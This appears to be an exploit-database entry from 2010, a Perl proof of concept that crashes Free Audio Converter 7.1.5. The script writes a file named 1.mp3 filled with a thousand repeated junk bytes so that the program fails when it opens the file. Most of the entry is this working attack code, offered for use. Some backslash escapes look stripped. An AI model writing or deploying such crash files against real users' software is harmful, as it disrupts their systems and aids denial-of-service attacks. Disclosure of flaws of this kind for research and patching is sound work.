[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Free Audio Converter 7.1.5 Denial of Service Vulnerability PoC
# Published : 2010-12-04
# Author : h1ch4m
# Previous Title : WaveMax Sound Editor 4.5.1 Denial of Service PoC
# Next Title : Mediamonkey 3.2.4.1304 (mp3) Buffer Overflow Vulnerability PoC
####
####
####Exploit Title: Free Audio Converter 7.1.5 Local Crash PoC
####Software Link: http://www.free-audio-converter.net/
####Tested on: Win XP SP3
####Date: 04-12-2010
####Author: h1ch4m
####Email: h1ch4m@live.fr
####
####
#Note: all vendor's products are affected.
my $file= "1.mp3";
my $junk = "x41" x 1000;
open($FILE,">$file");
print $FILE $junk;
close($FILE);
print "File Created successfullyn";
sleep(1);